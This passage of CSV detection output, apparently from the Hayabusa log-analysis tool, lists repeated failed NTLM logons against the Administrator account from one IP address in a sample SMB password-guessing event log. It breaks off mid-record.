2016-09-20 01:50:42.032 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HYGKv2l0s9XZnqkl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.078 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wX2R08dxiEcRNzcM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.120 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HcN791fdSHwaWuBC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.153 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CRObbkQsykQma2Tn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.194 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v4UvU7VglbA2p0Z9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.224 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8ODkwHD0dwGaWhVH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.272 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bPQ5GsX1UUXA6ws | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bvRQ0dVaLawXoo2O | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.359 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BjxwDdOYBDDSJGun | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: czlTDa1F6edSUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.436 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Mrtgv5HAqRuelEvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.484 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gfny9Y4SGRZTUXi7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.527 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hdhoRgnyj4JPpN2j | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.568 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: K4Qclkpq5ZMKmdCB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.612 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0GdZSrcqmfGBfAVy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XA7eJrFopzOb3YQS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.689 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2XoSwawv7Ji26GQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.729 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 637CaCAc9u7z99X7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.777 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5Y6Pww45qxQjrZ0C | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.822 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5CPU20SF5i6Cdq34 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.860 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HAdaPDVTws6TObvK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.901 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KUCoisntgbX7Mnis | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.952 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MFN0b769jRyDxyAW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:42.993 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HKr2OCyezvSEsHBZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.034 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QN3snXM4mwhauvvF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.163 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: J1VpvQgnwXVxRY1u | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.233 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: p5bsnUZjpHrbD6kN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.286 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hpL2QnQ0kKqU40a6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.369 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rpkpNfeTsOeXEsJ0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.400 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5mBhuTFm02IjipEw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.443 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yZ908ZOCkSBC7tms | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.487 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8l7Bct5nMTZHd5mK | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.522 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lRk6e7SrInMDsdMV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhGByctTcM7NXGtB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.604 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BgzhW3Pd5JAB8j4f | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.643 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GZOm1J5kdItrQpGL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.680 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DK77Hylw8CJHVGvb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.720 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pf7DQVQY7AowT8NY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:43.762 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4us3HR9jseQWIHt8 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.805 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vhJRmgooz8CXjB6E | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.848 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LkjIXxAvEDrPFUpZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.889 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ENc8aqouBangyUrU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.932 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 7flMdluc8YRhOuzn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:43.971 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8WFqeMJIXGDjDP0a | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.015 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iKeRDzfuDCJSv4Wh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gNEYkgBoG8rAE6SP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.090 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: vyy1aBvh6lJBs5M5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.146 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oyhiWNroUS5X5AEh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.184 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xg9rUUIwEfujwCvq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zfvpeyTKc3YYkVkw | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VJGR6CYKLUJp2fWl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.361 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cmSap0AJZq0KMRBV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.429 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XnVCbq1IYZF19oYR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.485 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aVaDMa2uNXTZNcBj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.538 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ymf6Fhv5ieWwcq73 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.584 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CT6YMlX1GqeEuAHl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.625 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FDJ1IFpMNQ2Euhyn | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.672 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EGTzqnHJIiZdSgNk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.732 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: epSckAKbAp8qag89 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NNC8ilAuznKPwFvV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.834 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wObt647cIBPiVaZi | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.873 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nYDe1L7NNxDGQ0Vt | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.927 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mXroClxv7B0aCTYv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:44.973 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kCVah2QOH1hMSV76 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.020 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2HjD65Xy4Hppim2l | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xwmEQxC4iTcF4aFu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.114 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q3QxOH7ok8RR068t | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.164 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dJFj6Ckw1HdK9w52 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.209 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Qqu3Im4HXQNyGnYm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bk5dmjQDnpSlREum | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.279 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Pk4BvYgXBR2whf80 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.327 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i6n1su2TUr7ONQr4 | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.368 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: givsEAGfG0smN9Re | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.418 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i2YuM0i7a2QuY7xb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 2016-09-20 01:50:45.470 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xuocQPZpd91adY0E | IP Addr: 192.168.198.149 | AuthPackage: 